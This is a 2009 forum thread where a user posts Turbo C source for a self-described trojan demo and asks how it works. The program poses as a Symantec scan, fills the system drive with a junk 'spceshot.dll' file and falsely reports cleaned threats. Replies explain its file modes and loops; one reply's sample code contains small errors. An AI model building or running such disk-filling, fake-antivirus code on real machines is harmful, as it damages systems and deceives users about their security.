Explain this c language code....only 2 parts of it?

**ankit8946** · 10-31-2009

here is the code...

Code:

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("*******************************…
gotoxy(12,6);
cputs("*******************************…
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","r…
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spcesh…
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spcesh…
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","r…
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spcesh…
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spcesh…
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","r…
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spcesh…
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spcesh…
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","r…
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spcesh…
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spcesh…
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}

my question is y is the file opened in rb and wb+ mode and what is being done during the loops by taking value 900000 in here
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);

**nadroj** · 10-31-2009

my question is y is the file opened in rb and wb+ mode

We cant see how the files are open, look at your posted code yourself to verify this. Therefore, we dont know which one is being opened with which attributes/mode. The "b" stands for binary, i.e. not plain text. I imagine you know what "r", "w", and "+" mean (if not, look at the documentation for fopen).

what is being done during the loops by taking value 900000

Looking at a comment at the top of the code, it says the program is to use up hard drive space. So it opens some files ("wb+") and just writes the "ch" string to it (see top of the file for value of "ch"), and it does this (at most) 4*900000 times. So it will write (at most) 4*900000*(strlen(ch)) = 4*900000*50 =~ 180MB. This certainly isnt the maximum file size on the given OS, which is what I would have first guessed that this large number is for. Therefore, the number isnt anything magical, its just a big number--it could be anything.

EDIT: I didnt notice that the code of writing to these files is in an infinite loop (while(1)). So, basically the two for loops dont really do anything--it would behave the same way if it was written as

Code:

while(1)
{
status=fputs(ch,b);

Still, the large number is arbitrary and doesnt really mean anything special.

Also, its very difficult to follow the code if you dont keep its formatting (spaces, tabs).

**ankit8946** · 10-31-2009

and also what is status=fputs(ch,b); trying to do...?i have only a vague idea abt this...

**Subsonics** · 10-31-2009

Originally Posted by ankit8946

and also what is status=fputs(ch,b); trying to do...?i have only a vague idea abt this...

fputs writes the string ch to the file handler b, while status collects the return value from fputs.

Look up the documentation of fputs().

**ankit8946** · 10-31-2009

fput will write binary value to it?

**nadroj** · 10-31-2009

Code:

status=fputs(ch,b);
if(status==EOF)
{
...
break;
}

From the documentation of fputs, it returns EOF when the function failed. This would happen if the file size exceeded the maximum supported by the OS, the file cant be written to (i.e. in use), or whatever other IO error. If the function returns EOF, then you cant write to it anymore, so it breaks out of the loop on this condition.

**nadroj** · 10-31-2009

Originally Posted by ankit8946

fput will write binary value to it?

It will write binary data. In this case, its writing a "char[]", which is just a sequence of characters, and it will appear in the file the same way as it would if you just wrote this string "normally" (i.e. fopen mode of "w" instead of "wb"). However, if you wrote something that isnt plain text, i.e. an "int", it would be converted to (4) bytes, and those bytes would be written to the file. If you wrote the integer "5" to the file, it wouldnt appear as a "5" in the file when you look at it--it will be binary data.

**ankit8946** · 10-31-2009

that is clear to me but my point is ...since the file created is dll...so when i write ch- which is a string is not readable...?

**rogster001** · 10-31-2009

Just as a general point i think you might be using ole turbo c ide there, i recommend you upgrade to codeblocks or similar... But as an illustrious member quotes... I might be wrong..

**ankit8946** · 10-31-2009

thnx evry1

**nadroj** · 10-31-2009

Originally Posted by ankit8946

that is clear to me but my point is ...since the file created is dll...so when i write ch- which is a string is not readable...?

A file's extension doesnt define its contents. Your "explorer.exe" in Windows is the same file if you rename it to "explorer", "explorer.txt", "explorer.dll", etc. However, Windows almost always relies on the files extension to determine what to do with it. So if you double click "explorer" it wont run it--it just doesnt know what to do with it. Other OSs (i.e. Unix) will look at the files contents rather than its extension to determine what to do with it, which is a much better way.

So, whether you open a .dll, .txt, .exe doesnt matter. All that matters is the mode you open it as. You could open up a plain-text .txt file as binary, and vice-versa. After you write to this .dll in the example, you could open it in a text viewer, and what you wrote is probably readable, i.e. plain text. However, there will be a lot of "random" characters (binary data) before that, since it is a binary file. For example, character "A" looks like that, whether you wrote it out as binary or plain-text ("normal"). However, as I said above, an integer "5" will look like garbage if you wrote it out as binary (because its not encoded as one byte, as a char is).

EDIT: The best thing to do is create a simple example. Create a file as binary ( fopen("myfile.txt","wb") ). Use "fputs" to write a char[] to it. Then use "fwrite" to write binary information to it, for example, an integer. "fwrite" is similar to "fputs", but can be used for any type ofoutput. "fputs" is used only for "char*" (string) output. Something like:

Code:

FILE * f = fopen("file.txt","wb");
char[] str = "abc";
fputs(str,f); // basically equivalent to: fwrite( str, strlen(str), 1, f);
int a = 999;
fwrite(&a, sizeof(a), 1, f);
fclose(f);

I havent compiled or tested this, but it should work--any errors should be trivial to fix. Then look at the file, and you should be able to read the string "abc", however "5000" will not appear as "5000".

**Elysia** · 10-31-2009

Originally Posted by nadroj

A file's extension doesnt define its contents. Your "explorer.exe" in Windows is the same file if you rename it to "explorer", "explorer.txt", "explorer.dll", etc. However, Windows almost always relies on the files extension to determine what to do with it. So if you double click "explorer" it wont run it--it just doesnt know what to do with it. Other OSs (i.e. Unix) will look at the files contents rather than its extension to determine what to do with it, which is a much better way.

You would think so, but that just makes it more difficult to see and change what type of file it is. Remember, Windows usually hides the extension of the filename, the same as Linux hides the type of the file by putting that information inside the file.

And I will bet you have needed to change the type of the file sometime or a lot of times.

**nadroj** · 10-31-2009

Originally Posted by Elysia

Remember, Windows usually hides the extension of the filename, the same as Linux hides the type of the file by putting that information inside the file.

Are you implying that Linux modifies all files, by putting some type of metadata in it? This certainly cannot be true. Some documentation can be found here: http://linux.die.net/man/1/file. It says that it determines the file type (one of: text, executable, or data) based on the contents of the file (opposed to Windows doing the opposite).

I know relatively nothing about filesystems, but I imagine somewhere in the tables it maintains is where the metadata would be, i.e. create/modify/access timestamps, filesize, etc. Probably the type of file is stored in this metadata, separate from the file itself. This would make sense so that any time an application asks for this information (ls, dir, GUI file management tools, etc), it has this information "cached", opposed to getting it everytime for every file. It wouldnt make sense to get a files type each time it was requested, because we usually dont change a file's "type", i.e. create a text file then overwrite its filename with an image file. Maybe Im digressing...

And I will bet you have needed to change the type of the file sometime or a lot of times.

I wasnt sure what you meant by this. EDIT: Is this similar to my last point? In that case, I showed the opposite

.

**Elysia** · 10-31-2009

Originally Posted by nadroj

Are you implying that Linux modifies all files, by putting some type of metadata in it? This certainly cannot be true. Some documentation can be found here: UNIX man pages : (). It says that it determines the file type (one of: text, executable, or data) based on the contents of the file (opposed to Windows doing the opposite).

Ah, now this I did not know. But how does it do for unknown file types?

I know relatively nothing about filesystems, but I imagine somewhere in the tables it maintains is where the metadata would be, i.e. create/modify/access timestamps, filesize, etc. Probably the type of file is stored in this metadata, separate from the file itself. This would make sense so that any time an application asks for this information (ls, dir, GUI file management tools, etc), it has this information "cached", opposed to getting it everytime for every file. It wouldnt make sense to get a files type each time it was requested, because we usually dont change a file's "type", i.e. create a text file then overwrite its filename with an image file. Maybe Im digressing...

I do not see the difference between having it as metadata and part of the filename. They can both be cached...

I wasnt sure what you meant by this.

Meaning that you might sometime want to change the type of the file, or make it become treated differently.

**nadroj** · 10-31-2009

Originally Posted by man file

If a file does not match any of the entries [...], it is examined to see if it seems to be a text file. ASCII, ISO-8859-x, non-ISO 8-bit extended-ASCII character sets (such as those used on Macintosh and IBM PC systems), UTF-8-encoded Unicode, UTF-16-encoded Unicode, and EBCDIC [...]. If a file passes any of these tests, its character set is reported.

Im sure somewhere else in all these different clauses it mentions in the final "else" case, though I havent looked deeply enough.

I do not see the difference between having it as metadata and part of the filename.

Nothing was said about filenames, though it certainly does not make sense to put anything besides a "filename" in...a filename. Basically, the point is that the file is not modified, it is handled by the underlying filesystem (somehow). If it modified the file, it would probably make it unreadable (unless there were a universal "header" for all files was adopted--unlikely).

EDIT:

Meaning that you might sometime want to change the type of the file, or make it become treated differently

As I mentioned in my edit above, I dont think this is occurs often. Things that change the most with files is, I imagine, in descending order: access/modify timestamps, file size, filename, file type. Of course theres no objective way I came to this, but just thinking about how we use files is what I based this on. Of course there are always special cases, but in that case maybe a different filesystem is used (one "optimized" for a different order of these frequencies). For the general user, my list might seem to be reasonable.

Thread: Explain this c language code....only 2 parts of it?

Thread Tools

Search Thread

Display

Explain this c language code....only 2 parts of it?

Ide

Similar Threads

Why C Matters

Request for comments

Could someone explain this code, string

<< !! Posting Code? Read this First !! >>

Which language do u mostly code in